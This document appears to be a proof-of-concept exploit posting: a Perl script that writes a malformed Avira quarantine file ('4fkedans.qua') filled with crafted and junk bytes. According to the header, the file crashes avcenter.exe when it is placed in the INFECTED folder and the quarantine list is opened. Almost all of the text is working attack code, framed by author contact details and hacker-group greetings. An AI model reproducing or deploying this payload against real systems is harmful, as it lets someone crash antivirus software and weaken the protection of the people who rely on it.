#================================================================================= |
#| # Title: Avira AntVir QUA file in ( avcenter.exe) Local Crash PoC|
#| # Author : KedAns-Dz |
#| # email: Ked-h@hotmail.com|
#| # Home : HMD/AM (30500/04300) - Algeria -(00213555248701) |
#| # Web Site : /(~_-)\ ...|
#| # Tested on : windows XP SP3 Français & Arabic |
#| # Target SFW : Avira Anti Virus Version |
#| # Info : Copy the QUA file in : |
#..\..\All Users\Application Data\Avira\AntiVir Desktop\INFECTED |
#> You are Opening The avcenter.exe and show Quarantine list |
#the avcenter is Task kill and Show Crash Error |
#======================Exploit By KedAns-Dz =================================|
# Perl File:
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
print "\n\n".
"|| Avira AntVir Local Crash PoC ||\n".
"||Exploit Buffer Overflow ||\n".
"||Created BY KedAns-Dz||\n".
"|| ked-h(at)hotmail(dot)com ||\n".
print "\n";
my $Buf =
"\x00" x 51 .
"\x4b\x65\x64\x40\x41\x6e\x73\x2f\x41\x76\x32\x42\x6f\x46\x2e\x50\x6c\x7c". # Infected Name
"\x31" x 378 . # Bad Multi Number
"\x00" x 48 .
"\x5c\x00\x5c\x00\x3f\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x4b\x00\x2e\x00\x44\x00\x7a" . # Path V-Qua
"\x41" x 380 ; # Junk
$file = "4fkedans.qua";
open (F ,">$file");
print F $Buf;
sleep (2);
print "\n Creat File : $file , Succesfully ! \n";
close (F);
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================|
#[»] Team :[D] HaCkerS-StreeT-Team [Z] > Algerians Hackers < |
# Greetz : Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride * Massinhou-Dz |
# Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED * all my friends ..|